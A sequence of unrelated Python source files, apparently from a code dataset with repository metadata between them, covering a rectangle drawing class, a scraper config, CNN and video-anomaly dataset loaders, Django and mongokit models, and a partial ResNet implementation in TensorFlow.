    def set_has_stroke(self, enable):
        """
        Set whether stroke is enabled (bool)
        """
        self._has_stroke = enable

    def get_has_stroke(self):
        """
        Retrieve whether stroke is enabled (bool)
        """
        return self._has_stroke

    def set_has_fill(self, enable):
        """
        Set whether fill is enabled (bool)
        """
        self._has_fill = enable

    def get_has_fill(self):
        """
        Retrieve whether fill is enabled (bool)
        """
        return self._has_fill

    def set_x(self, x):
        """
        Set x coordinate of rectangle (top-left)
        """
        self._x = x

    def get_x(self):
        """
        Retrieve x coordinate of rectangle (top-left)
        """
        return self._x

    def set_y(self, y):
        """
        Set y coordinate of rectangle (top-left)
        """
        self._y = y

    def get_y(self):
        """
        Retrieve y coordinate of rectangle (top-left)
        """
        return self._y

    def set_width(self, width):
        """
        Set width of rectangle
        """
        self._width = width

    def get_width(self):
        """
        Retrieve width of rectangle
        """
        return self._width

    def set_height(self, height):
        """
        Set height of rectangle
        """
        self._height = height

    def get_height(self):
        """
        Retrieve height of rectangle
        """
        return self._height

    def draw(self, canvas):
        """
        Draw the control's graphical data on the canvas.

        BUG FIX: the stroke was previously drawn inside the fill loop using
        the loop variable `y` (wrong coordinates, and a NameError whenever
        has_fill was False). The outline is now drawn once from the
        rectangle's own corners.
        """
        if self._has_fill:
            # Fill by drawing one horizontal line per row.
            for row in range(self._y, self._y + self._height):
                graphics.DrawLine(canvas, self._x, row, self._x + self._width, row, self._fill_color_obj)
        if self._has_stroke:
            x0 = self._x
            y0 = self._y
            x1 = self._x + self._width
            y1 = self._y + self._height
            graphics.DrawLine(canvas, x0, y0, x1, y0, self._stroke_color_obj)
            graphics.DrawLine(canvas, x1, y0, x1, y1, self._stroke_color_obj)
            graphics.DrawLine(canvas, x0, y1, x1, y1, self._stroke_color_obj)
            graphics.DrawLine(canvas, x0, y0, x0, y1, self._stroke_color_obj)

    stroke_color = property(get_stroke_color, set_stroke_color)
    fill_color = property(get_fill_color, set_fill_color)
    has_stroke = property(get_has_stroke, set_has_stroke)
    has_fill = property(get_has_fill, set_has_fill)
    x = property(get_x, set_x)
    y = property(get_y, set_y)
    width = property(get_width, set_width)
    height = property(get_height, set_height)
| [
"malcolmst@gmail.com"
] | malcolmst@gmail.com |
91f260cf71db0de0e80ef889491e1b41ea62cfa3 | 1987ad7e2ac29ff115d6a8442cf4257f4cb2f472 | /scrapping/config/config.py | 463f8991dc6115769b4f552e839e19ab125d4d4a | [
"MIT"
class Config:
    """Static scraping configuration for the quotes spider."""

    # Identify as an old IE browser to avoid trivial bot filtering.
    USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'

    # Seed URLs the crawl starts from.
    URLS_TO_SCRAP = [
        'http://quotes.toscrape.com/page/1/',
    ]

    # Only follow links within these domains.
    DOMAINS_TO_SCRAP = [
        'toscrape.com',
    ]

    # Keep only items whose text matches one of these keywords.
    KEYWORDS_FILTER = [
        'Harry',
        'value',
        'love',
    ]
| [
"andy.teea@gmail.com"
] | andy.teea@gmail.com |
fd6031cd9788e6476f242b52aa82d334c941e20a | 68ef9983a00f555b8d8cd0b961e4a58b29506b0a | /create_data.py | a3d72e0ca4872042656082db6d01f8eb744172a1 | [] | no_license | ttrunghieu201195/CNNs | 5d7e4f471ef158ecd90fa6d8fd2f33b4a1b6de20 | 0f321f5d3a0e9781074abd6a9aca7b22ed33872b | refs/heads/master | 2021-01-19T10:32:09.471984 | 2017-07-23T17:28:05 | 2017-07-23T17:28:05 | 87,875,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,103 | py | import matplotlib.pyplot as plt
import os
import tensorflow as tf
from tqdm import tqdm
from random import shuffle
import cv2
import numpy as np
# Figure used for optional visual inspection of samples.
fig=plt.figure()
# Class names in the data set:
# ngoc, nguyen, ky, truong, phhuc, duc, huyen, thinh, duyen, hieu, lgiang, giang, hau, my, btran, tram, manh
# One subfolder per class under each split directory; hidden folders are skipped.
train_dir = '/home/manhthe/project/dulieu/train'
train_list=[os.path.join(train_dir,folder) for folder in
            os.listdir(train_dir) if not folder.startswith('.')]
valid_dir = '/home/manhthe/project/dulieu/valid'
valid_list = [os.path.join(valid_dir,folder) for folder in
              os.listdir(valid_dir) if not folder.startswith('.')]
test_dir = '/home/manhthe/project/dulieu/test'
test_list = [os.path.join(test_dir,folder) for folder in
             os.listdir(test_dir) if not folder.startswith('.')]
# Directory of unlabeled images for ad-hoc prediction checks.
check_dir = '/home/manhthe/Downloads/Desktop/giangoc'
# ngoc_dir = '/home/ngoc/luanvan/huyen'
# ngoc_dir = '/home/ngoc/luanvan/ngoc'
# tram_dir = '/home/ngoc/luanvan/Tram'
# tran_dir = '/home/ngoc/luanvan/tran'
# lgiang_dir = '/home/ngoc/luanvan/Giang'
# All images are resized to IMG_SIZE x IMG_SIZE before flattening.
IMG_SIZE = 128
def one_hot(element, list_of_elements):
    """Return a one-hot list marking *element*'s first position.

    Example: one_hot('C', ['A', 'B', 'C', 'D']) -> [0, 0, 1, 0].
    In this project, *element* is a class folder path and
    *list_of_elements* is the list of all class folders.
    Raises ValueError when *element* is not present.
    """
    target = list_of_elements.index(element)
    return [1 if i == target else 0 for i in range(len(list_of_elements))]
def create_train_data():
    """Load, grey-scale, resize and flatten every training image.

    Returns a shuffled list of [pixel_vector, one_hot_label] pairs, one per
    image found under the class folders listed in train_list.
    """
    samples = []
    for class_dir in train_list:
        label = one_hot(class_dir, train_list)
        for file_name in tqdm(os.listdir(class_dir)):
            image_path = os.path.join(class_dir, file_name)
            image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)
            image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
            flattened = image.reshape(IMG_SIZE * IMG_SIZE)
            samples.append([np.array(flattened), np.array(label)])
    shuffle(samples)
    print("Create train data success!!!")
    return samples
def create_valid_data():
    """Load, grey-scale, resize and flatten every validation image.

    Returns a shuffled list of [pixel_vector, one_hot_label] pairs, one per
    image found under the class folders listed in valid_list.
    """
    samples = []
    for class_dir in valid_list:
        label = one_hot(class_dir, valid_list)
        for file_name in tqdm(os.listdir(class_dir)):
            image_path = os.path.join(class_dir, file_name)
            image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)
            image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
            flattened = image.reshape(IMG_SIZE * IMG_SIZE)
            samples.append([np.array(flattened), np.array(label)])
    shuffle(samples)
    print("Create valid data success!!!")
    return samples
def create_test_data():
    """Load, grey-scale, resize and flatten every test image.

    Returns a shuffled list of [pixel_vector, one_hot_label] pairs, one per
    image found under the class folders listed in test_list. Each class
    folder path is echoed once it has been processed.
    """
    samples = []
    for class_dir in test_list:
        label = one_hot(class_dir, test_list)
        for file_name in tqdm(os.listdir(class_dir)):
            image_path = os.path.join(class_dir, file_name)
            image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)
            image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
            flattened = image.reshape(IMG_SIZE * IMG_SIZE)
            samples.append([np.array(flattened), np.array(label)])
        print(class_dir)
    shuffle(samples)
    print("Create test data success!!!")
    return samples
def test_data_random():
    """Load unlabeled images from check_dir for ad-hoc prediction checks.

    Returns a shuffled list of single-element [pixel_vector] entries, one
    per image in check_dir.
    """
    check_data = []
    for img in os.listdir(check_dir):
        path = os.path.join(check_dir, img)
        img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
        img = cv2.resize(img, (IMG_SIZE, IMG_SIZE))
        img = img.reshape(IMG_SIZE * IMG_SIZE)
        check_data.append([np.array(img)])
        # BUG FIX: the original printed `folder`, a name that is never
        # defined in this function (NameError at runtime); report the
        # processed file path instead.
        print(path)
    shuffle(check_data)
    print("Create test data success!!!")
    return check_data
# train_data = create_train_data()
# print("Size of train data:",len(train_data))
# eval_data = create_eval_data()
# print("Size of eval data:",len(eval_data))
# # test_data = process_test_data()
# test_data = process_test_data()
# print("Size of test data:",len(test_data))
# random_data = test_data_random()
# print("Size of test data:",len(random_data))
# print(random_data[0])
| [
"noreply@github.com"
] | ttrunghieu201195.noreply@github.com |
2420c54f791413642767813dfd8347704d94dceb | 5969c67fccfe0a7aa7daa6592582c92de73c71db | /server/server/urls.py | abe0051a3821d709a368b838f65376e2895757c9 | [] | no_license | llm123456/games | 8d44f426eb369672b4e14f2ed3246d6a12b2ba0b | 15b89845c984de6a76746e0f48bc8cd48d05d0e8 | refs/heads/master | 2020-04-19T03:34:45.502742 | 2019-01-29T06:52:53 | 2019-01-29T06:52:53 | 167,938,308 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 799 | py | """server URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path

from restapi import urls
urlpatterns = [
    path('admin/', admin.site.urls),
    # BUG FIX: path() requires a view or an include() result; passing the
    # restapi.urls module directly raises ImproperlyConfigured. Delegate
    # everything under api/ to the restapi app's URLconf via include().
    path('api/', include(urls)),
]
| [
"lijiang71"
] | lijiang71 |
f9ab294c7952ed0de17c16970f6acc6bab6a37e2 | 5587bf97e43a24b1a23a68f6c6b7692fa6c7aea5 | /dataset_feat.py | 89e110a8e517ad58d3eca2a43648da2f6c5e26e7 | [] | no_license | DogsHeadZ/WVAD | 743f42a6203bcd0e97bb2633acdae545c6fd2e4b | 91382923b4bcb7c83fc8776fbd2cf3d096ee6ba8 | refs/heads/master | 2023-08-14T12:55:27.833515 | 2021-09-07T02:25:33 | 2021-09-07T02:25:33 | 400,154,068 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,267 | py | import torch.utils.data as data
import numpy as np
import torch
import numpy as np
import h5py
import cv2
import os
from torch.utils.data import DataLoader
# Make newly created tensors default to CUDA float tensors; this requires a
# GPU to be available at import time. NOTE(review):
# torch.set_default_tensor_type is deprecated in recent PyTorch releases.
torch.set_default_tensor_type('torch.cuda.FloatTensor')
def process_feat(feat, length):
    """Resample a (T, F) feature array to exactly `length` temporal segments.

    Pre-extracted features are split into a variable number T of 16-frame
    snippets, but training needs a fixed temporal length: consecutive rows
    are averaged (or the nearest row repeated when T < length) to produce a
    (length, F) array.

    Args:
        feat: np.ndarray of shape (T, F).
        length: desired number of output segments.

    Returns:
        np.float32 array of shape (length, F).
    """
    new_feat = np.zeros((length, feat.shape[1]), dtype=np.float32)
    # Segment boundaries. BUG FIX: the np.int alias was removed in
    # NumPy 1.24, so dtype=np.int raises AttributeError; the builtin int
    # is the documented replacement.
    r = np.linspace(0, len(feat), length + 1, dtype=int)
    for i in range(length):
        if r[i] != r[i + 1]:
            # Average all source rows that fall inside this segment.
            new_feat[i, :] = np.mean(feat[r[i]:r[i + 1], :], 0)
        else:
            # Fewer source rows than segments: repeat the nearest row.
            new_feat[i, :] = feat[r[i], :]
    return new_feat
class Dataset_f(data.Dataset):
    """Weakly-supervised video anomaly dataset over pre-extracted features.

    In training mode it yields fixed-length (32-segment) feature tensors
    with a video-level normal/abnormal label; in test mode it yields the
    full-length features together with frame-level anomaly masks.
    """

    def __init__(self, rgb_list_file, rgb_file, flow_file, train_txt, test_txt, test_mask_dir, is_normal=True, segment_len=16, transform=None, test_mode=False):
        self.rgb_list_file = rgb_list_file  # list of .npy feature file paths
        self.rgb_file = rgb_file            # HDF5 file of per-snippet RGB features
        self.flow_file = flow_file          # HDF5 file of per-snippet flow features
        self.train_txt = train_txt          # "video_key,label" lines for training
        self.test_txt = test_txt            # "video_key,label,frame_count" lines for testing
        self.test_mask_dir = test_mask_dir  # directory of per-video frame-level .npy masks
        self.is_normal = is_normal          # select normal (True) or abnormal videos
        self.segment_len = segment_len      # frames per feature snippet
        self.tranform = transform           # (sic) optional feature transform
        self.test_mode = test_mode
        if not test_mode:
            self.get_vid_names_dict()
            # Train mode: pick either the normal or the abnormal video set.
            if is_normal:
                self.selected_keys = list(self.norm_vid_names_dict.keys())
                self.selected_dict = self.norm_vid_names_dict
            else:
                self.selected_keys = list(self.abnorm_vid_names_dict.keys())
                self.selected_dict = self.abnorm_vid_names_dict
        else:
            # Test mode: annotations drive the key list instead.
            self.test_dict_annotation()
            self.selected_keys = list(self.annotation_dict.keys())
            self.selected_dict = self.annotation_dict
        self._parse_list()

    def get_vid_names_dict(self):
        """Build {video_key: snippet_count} dicts for normal/abnormal videos.

        HDF5 keys look like "<video_key>-<snippet_index>"; the count of
        matching keys is the number of 16-frame snippets per video.
        """
        keys = sorted(list(h5py.File(self.rgb_file, 'r').keys()))
        self.norm_vid_names_dict = {}
        self.abnorm_vid_names_dict = {}
        for line in open(self.train_txt,'r').readlines():
            key,label=line.strip().split(',')
            if label=='1':
                # Label '1' marks an abnormal video.
                for k in keys:
                    if key == k.split('-')[0]:
                        if key in self.abnorm_vid_names_dict.keys():
                            self.abnorm_vid_names_dict[key]+=1
                        else:
                            self.abnorm_vid_names_dict[key]=1
            else:
                for k in keys:
                    if key == k.split('-')[0]:
                        if key in self.norm_vid_names_dict.keys():
                            self.norm_vid_names_dict[key]+=1
                        else:
                            self.norm_vid_names_dict[key]=1

    def test_dict_annotation(self):
        """Build {video_key: [frame_mask, snippet_count]} for the test set."""
        self.annotation_dict = {}
        keys=sorted(list(h5py.File(self.rgb_file, 'r').keys()))
        for line in open(self.test_txt,'r').readlines():
            # The frame count stored in the file is wrong, so it is ignored
            # and recounted from the HDF5 keys below.
            key,anno_type,frames_num = line.strip().split(',')
            frames_seg_num = 0
            for k in keys:
                if k.split('-')[0] == key:
                    frames_seg_num += 1
            if anno_type=='1':
                label='Abnormal'
                # Frame-level ground-truth mask, clipped to the covered frames.
                anno = np.load(os.path.join(self.test_mask_dir, key + '.npy'))[:frames_seg_num * self.segment_len]
            else:
                label='Normal'
                anno=np.zeros(frames_seg_num * self.segment_len,dtype=np.uint8)
            self.annotation_dict[key]=[anno,frames_seg_num]

    def _parse_list(self):
        """Load the feature-file list; in train mode split it by label.

        NOTE(review): the first 63 entries are assumed to be abnormal
        videos and the rest normal — confirm against the list file.
        """
        self.list = list(open(self.rgb_list_file))
        if self.test_mode is False:
            if self.is_normal:
                self.list = self.list[63:]
                print('normal list')
                # print(self.list)
            else:
                self.list = self.list[:63]
                print('abnormal list')
                # print(self.list)

    def __getitem__(self, index):
        # Load the pre-extracted features provided by RTFM.
        label = self.get_label(index) # get video level label 0/1
        features = np.load(self.list[index].strip('\n'), allow_pickle=True)
        features = np.array(features, dtype=np.float32)
        if self.tranform is not None:
            features = self.tranform(features)
        if self.test_mode:
            frames_seg_num = features.shape[0]
            # Derive the video key from the feature file name
            # (strip directory, extension and a 4-char suffix).
            key = self.list[index].strip('\n').split('/')[-1].split('.')[0][:-4]
            # NOTE(review): the first 44 test entries appear to be the
            # abnormal videos that have mask files — confirm.
            if index<44:
                anno = np.load(os.path.join(self.test_mask_dir, key + '.npy'))[:frames_seg_num * self.segment_len]
                if anno.shape[0] < frames_seg_num * self.segment_len:
                    # Mask shorter than the features: drop the last snippet
                    # so mask and features stay aligned.
                    anno = anno[:(frames_seg_num-1) * self.segment_len]
                    features = features[:-1]
            else:
                anno=np.zeros(frames_seg_num * self.segment_len,dtype=np.uint8)
            return features, features, anno
        else:
            features = features.transpose(1, 0, 2) # [10, T, F]
            divided_features = []
            for feature in features:
                # Collapse the variable-length T axis to 32 segments per crop.
                feature = process_feat(feature, 32)
                divided_features.append(feature)
            divided_features = np.array(divided_features, dtype=np.float32)
            return divided_features, divided_features, label
        ########################## # Below: loading our own extracted I3D
        # features. They performed badly, so this code path is unused
        # (unreachable after the returns above) but kept for now.
        key = self.selected_keys[index]
        if not self.test_mode:
            video_len = self.selected_dict[key]
        else:
            video_len = self.selected_dict[key][1]
        frame_feats = []
        flow_feats = []
        with h5py.File(self.rgb_file, 'r') as rgb_h5, h5py.File(self.flow_file, 'r') as flow_h5:
            for i in range(video_len):
                frame_feats.extend(rgb_h5[key + '-{0:06d}'.format(i)][:]) # [1,1024]
                flow_feats.extend(flow_h5[key + '-{0:06d}'.format(i)][:])
        frame_feats = np.stack(frame_feats)
        flow_feats = np.stack(flow_feats)
        label = self.get_label(index) # get video level label 0/1
        if self.tranform is not None:
            frame_feats = self.tranform(frame_feats)
            flow_feats = self.tranform(flow_feats)
        if self.test_mode:
            anno = self.annotation_dict[key][0]
            return torch.from_numpy(frame_feats).unsqueeze(0), torch.from_numpy(flow_feats).unsqueeze(0), torch.from_numpy(anno)
        else:
            frame_feats = process_feat(frame_feats, 32) # [32, F]
            frame_feats = np.array(frame_feats, dtype=np.float32)
            flow_feats = process_feat(flow_feats, 32) # [32, F]
            flow_feats = np.array(flow_feats, dtype=np.float32)
            return torch.from_numpy(frame_feats).unsqueeze(0), torch.from_numpy(flow_feats).unsqueeze(0), torch.from_numpy(label)

    def get_label(self, index):
        """Return the video-level label: 0.0 for normal, 1.0 for abnormal."""
        if self.is_normal:
            # label[0] = 1
            label = np.zeros(1, dtype=np.float32)
        else:
            label = np.ones(1, dtype=np.float32)
            # label[1] = 1
        return label

    def __len__(self):
        return len(self.selected_keys)
| [
"565807094@qq.com"
] | 565807094@qq.com |
fe6aaab1a8339dd6dc8d16d83021eb02079bdd3c | cc352b04dc8eb5033399a8925274f23be51ae3bf | /leonardo/__init__.py | 778f36dfa838719fd5e13576cde4c652cb4a8cd6 | [
"BSD-2-Clause"
] | permissive | lukaszle/django-leonardo | 1dcb16f0155495d4ef0e52f667450ee53f2b58be | a54dd0822c3d8fbf4a52547d0ad3ae17c04b88b7 | refs/heads/master | 2021-01-18T09:36:08.203184 | 2016-02-01T20:25:37 | 2016-02-01T20:25:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 520 | py |
# Default Django AppConfig for the leonardo application.
default_app_config = 'leonardo.apps.LeonardoConfig'

# Declare this package as a setuptools namespace package.
__import__('pkg_resources').declare_namespace(__name__)

try:
    from leonardo.base import leonardo  # noqa
except ImportError:
    # Dependencies are not installed yet (normal during setup); emit a
    # compact, single-line warning instead of failing the import.
    import warnings

    def simple_warn(message, category, filename, lineno, file=None, line=None):
        # Minimal warning format: "Category: message".
        return '%s: %s' % (category.__name__, message)

    msg = ("Could not import Leonardo dependencies. "
           "This is normal during installation.\n")
    warnings.formatwarning = simple_warn
    warnings.warn(msg, Warning)
| [
"6du1ro.n@gmail.com"
] | 6du1ro.n@gmail.com |
0721bd1f0daa8d45556597f6aa9566cd8f5898d8 | 1d37f6784db92f8ad0a186f38b9568439931e3c8 | /web/common/loader.py | cdd1efa0c75107000172cf575a630ed95da24dd7 | [] | no_license | songboyu/defect-mining | 1a79b725e7a3471b8b6ea5b872f030ded3809427 | 3f9370a869ae2e30f2831379ef877b16a4b71bca | refs/heads/master | 2021-01-22T23:21:18.087154 | 2017-06-01T09:51:17 | 2017-06-01T09:51:17 | 85,629,919 | 22 | 8 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | # -- coding: utf-8--
import web.settings
from web import mining
# Re-export the installed app list from the project settings.
APPS = web.settings.APPS

def load_url_handlers():
    """Return the URL handler table exposed by the mining app."""
    return mining.url_handlers
| [
"benny.sby@alibaba-inc.com"
] | benny.sby@alibaba-inc.com |
3b1b0d692cb0b9bbbf3cc51edeeec124faad06eb | dc03c35f1bca775dac0d88021f01bd90f70a610f | /cf/models.py | be459324ff6fa1a77b361be8595bc1eda65acafe | [] | no_license | node31/semantic_search_collaborative_filtering | 98ced7d2471c2b9d883bd59ed2ca5335a1092176 | cd3e48123360d5430cdbb5d9558df117f3aa98ea | refs/heads/master | 2020-05-27T13:56:55.079630 | 2014-07-07T12:53:53 | 2014-07-07T12:53:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 980 | py | from django.db import models
from django_mongokit.document import DjangoDocument
from django_mongokit import connection
from bson import ObjectId
class MyDocs(DjangoDocument):
    """Raw source document stored in MongoDB (MongoKit schema)."""
    structure={
        'content':unicode,       # full document text (Python 2 unicode)
        'required_for':unicode,  # pipeline stage this document is needed for
    }
    use_dot_notation = True
# Make MyDocs available through the shared django-mongokit connection.
# NOTE(review): the other document classes in this module are never
# registered — confirm whether that is intentional.
connection.register([MyDocs])
class ReducedDocs(DjangoDocument):
    """Map-reduced form of a document, keyed back to its original."""
    structure={
        'content':dict, #This contains the content in the dictionary format
        'orignal_id':ObjectId,  # (sic, misspelled schema key) id of the source MyDocs document
        'required_for':unicode,
        'is_indexed':bool, #This will be true if the map reduced document has been indexed.If it is not then it will be false
    }
    use_dot_notation = True
class ToReduceDocs(DjangoDocument):
    """Work-queue entry pointing at a document awaiting map-reduce."""
    structure={
        'doc_id':ObjectId,       # id of the document to be reduced
        'required_for':unicode,  # pipeline stage this work item belongs to
    }
    use_dot_notation = True
class IndexedWordList(DjangoDocument):
    """Bucketed inverted-index shard of indexed words."""
    structure={
        'word_start_id':float,   # bucket id: 0=a, 1=b, ... 25=z, 26=misc (see note below)
        'words':dict,            # word -> postings for this bucket
        'required_for':unicode,  # pipeline stage this index serves
    }
    use_dot_notation = True
#word_start_id = 0 --- a ,1---b,2---c .... 25---z,26--misc.
# Create your models here.
| [
"pranavgupta3131@gmail.com"
] | pranavgupta3131@gmail.com |
2d6fced001982c85bda4c3008e1f9051ce24ffda | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_14387.py | 1a3c8e77f0bda5b6a8b9a9699422269adf3d924c | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | # Python Celery Task.update_state potentially blocks forever
BROKER_POOL_LIMIT = 100  # cap the Celery broker connection pool
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
db15c5b278b0546d1a6f99bd0e0dd0a6fa69804d | 1569d2ded6f0f4821eee1afffcde56091e75ee91 | /test_ert_gs.py | 2c71831041fa0257f5dffd433da7cd52d77da659 | [] | no_license | moziyu/ALTianChi | 7ce19a2767008bcceadf1b1b97ab9fff7b926634 | 4d2cba4cfcf28e57e2fb33fbbfc2bb8068a8dfad | refs/heads/master | 2021-01-22T19:04:38.232174 | 2017-03-16T06:51:26 | 2017-03-16T06:51:26 | 85,158,430 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 94 | py | from models.ert_gs_regress import ert_gs_regress
if __name__=='__main__':
ert_gs_regress() | [
"wrzhen@163.com"
] | wrzhen@163.com |
9f927ff07dcec58f1a39ba3790c0f02454bd8b41 | 7494f6791b27ab7a8e33db3fa16040471e4552fd | /sketch_based_image_retrieval/resnet_init.py | fb8f2c3bac5b8082a779c0edcc37f0a8dc615dbb | [] | no_license | lindaCai1997/neural_nets | f2232b7f7fd72cba67a2e1e7cee290232973a58f | 79b731f963bdac99913352083b6e15ee4147d6bf | refs/heads/master | 2020-09-13T22:47:45.168385 | 2016-09-07T04:58:31 | 2016-09-07T04:58:31 | 67,542,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,397 | py | import skimage.io
import skimage.transform
import tensorflow as tf
import numpy as np
from numpy import array
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.training import moving_averages
import datetime
import os
import time
''' This pretraining network is a reconstruction based on memory of
https://github.com/ry/tensorlow-resnet/blob/master/resnet.py
It's only meant as an exercise for the author and by no means replaces the orginial resnet
function order(up to down): define variable, single layer,
block of layers, stack of blocks, full network( without loss function ), training function
'''
MOMENTUM = 0.9
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('photo_train_dir', 'photo/train_variables',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_string('sketch_train_dir', 'sketch/train_variables',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_string('combined_train_dir', 'combine_train_variables',
"""Derectory where to write event logs """)
tf.app.flags.DEFINE_float('learning_rate', 0.001, "learning rate.")
tf.app.flags.DEFINE_integer('batch_size', 16, "batch size")
tf.app.flags.DEFINE_integer('max_steps', 500000, "max steps")
tf.app.flags.DEFINE_boolean('resume', False,
'resume from latest saved state')
tf.app.flags.DEFINE_boolean('minimal_summaries', True,
'produce fewer summaries to save HD space')
MOVING_AVERAGE_DECAY = 0.9997
BN_DECAY = MOVING_AVERAGE_DECAY
BN_EPSILON = 0.001
CONV_WEIGHT_DECAY = 0.00004
CONV_WEIGHT_STDDEV = 0.1
FC_WEIGHT_DECAY = 0.00004
FC_WEIGHT_STDDEV = 0.01
RESNET_VARIABLES = 'resnet_variables'
UPDATE_OPS_COLLECTION = 'resnet_update_ops' # must be grouped with training op
RESTORE = True
activation = tf.nn.relu
# ==========wrapper function to initialize a variable================
def _get_variable(name, shape, initializer, weight_decay = 0.0,
                  dtype = 'float', trainable=True):
    '''Create a variable through tf.get_variable, optionally attaching an L2
    regularizer, and register it in the resnet variable collection.
    '''
    regularizer = None
    if weight_decay > 0:
        regularizer = tf.contrib.layers.l2_regularizer(weight_decay)
    var_collections = [tf.GraphKeys.VARIABLES, RESNET_VARIABLES]
    return tf.get_variable(name,
                           shape=shape,
                           initializer=initializer,
                           dtype=dtype,
                           regularizer=regularizer,
                           collections=var_collections,
                           trainable=trainable)
# ===================================================================
# ===========wrapper functions to define network layers==============
def conv(x, size, num_units_out):
    """Stride-1 'SAME' 2-D convolution with a learned size x size kernel."""
    in_channels = x.get_shape()[3]
    kernel = _get_variable(
        'weights',
        shape=[size, size, in_channels, num_units_out],
        dtype='float',
        initializer=tf.truncated_normal_initializer(stddev=CONV_WEIGHT_STDDEV),
        weight_decay=CONV_WEIGHT_DECAY)
    return tf.nn.conv2d(x, kernel, strides=[1, 1, 1, 1], padding='SAME')
def fc(x, num_units_out):
    """Fully connected layer: x * W + b, with no activation applied."""
    in_dim = x.get_shape()[1]
    # NOTE(review): weight_decay is passed FC_WEIGHT_STDDEV here rather than
    # FC_WEIGHT_DECAY (which is otherwise unused) — confirm this is intended.
    weights = _get_variable(
        'weights',
        shape=[in_dim, num_units_out],
        initializer=tf.truncated_normal_initializer(stddev=FC_WEIGHT_STDDEV),
        weight_decay=FC_WEIGHT_STDDEV)
    biases = _get_variable('biases', shape=[num_units_out],
                           initializer=tf.zeros_initializer)
    return tf.nn.xw_plus_b(x, weights, biases)
def _max_pool(x, size, step):
    """Max-pool with a size x size window, `step` stride, 'SAME' padding."""
    return tf.nn.max_pool(x,
                          ksize=[1, size, size, 1],
                          strides=[1, step, step, 1],
                          padding='SAME')
def bn(x, use_bias=False, is_training=True):
    """Batch-normalize x over every axis but the last (channels).

    With use_bias=True normalization is skipped entirely and only a learned
    bias is added. Otherwise batch statistics are used while is_training is
    true, and the exponential moving averages otherwise; the moving-average
    update ops are registered in UPDATE_OPS_COLLECTION and must be run
    together with the training op (see the constant's comment above).
    """
    is_training = tf.convert_to_tensor(is_training, dtype='bool', name='is_training')
    x_shape = x.get_shape()
    params_shape = x_shape[-1:]
    if use_bias:
        # Bias-only mode: no normalization at all.
        bias = _get_variable('bias', params_shape, initializer=tf.zeros_initializer)
        return x + bias
    axis = list(range(len(x_shape) - 1))
    beta = _get_variable('beta', params_shape, initializer=tf.zeros_initializer)
    gamma = _get_variable('gamma', params_shape, initializer=tf.ones_initializer)
    # Moving statistics are not trained directly; they track batch statistics.
    moving_mean = _get_variable('moving_mean', params_shape,
                                initializer=tf.zeros_initializer, trainable=False)
    moving_variance = _get_variable('moving_variance', params_shape,
                                    initializer=tf.ones_initializer, trainable=False)
    mean, variance = tf.nn.moments(x, axis)
    update_moving_mean = moving_averages.assign_moving_average(moving_mean, mean, BN_DECAY)
    update_moving_variance = moving_averages.assign_moving_average(moving_variance, variance, BN_DECAY)
    tf.add_to_collection(UPDATE_OPS_COLLECTION, update_moving_mean)
    tf.add_to_collection(UPDATE_OPS_COLLECTION, update_moving_variance)
    # Training: use this batch's statistics; evaluation: use moving averages.
    mean, variance = control_flow_ops.cond(is_training, lambda: (mean, variance), lambda: (moving_mean, moving_variance))
    x = tf.nn.batch_normalization(x, mean, variance, beta, gamma, BN_EPSILON)
    return x
def loss(logits, labels):
    """Mean sparse softmax cross-entropy plus all collected L2
    regularization losses; also emits a 'loss' scalar summary.
    """
    # Removed the dead debug locals (`weird`/`two`) that only called
    # get_shape() and were never used.
    cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits, labels)
    cross_entropy_mean = tf.reduce_mean(cross_entropy)
    regularization_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
    loss_ = tf.add_n([cross_entropy_mean] + regularization_losses)
    tf.scalar_summary('loss', loss_)
    return loss_
#================================================================================
#========helper function to define a block of resnet layers======================
def block(x, size, bottleneck, block_filter_internal, is_training, use_bias):
    """One residual block.

    bottleneck=True builds the three-conv variant with
    filters_out = 4 * block_filter_internal; otherwise two 3x3 convs with
    filters_out = block_filter_internal. The shortcut gets a 1x1 projection
    (plus bn) whenever the channel count changes.
    """
    filters_in = x.get_shape()[-1]
    m = 4 if bottleneck else 1
    filters_out = m*block_filter_internal
    shortcut = x
    if bottleneck:
        num_units_out = block_filter_internal
        # BUG FIX: this scope was created with tf.varable_scope (a typo that
        # raised AttributeError as soon as the bottleneck path was used).
        with tf.variable_scope('a'):
            size = 1
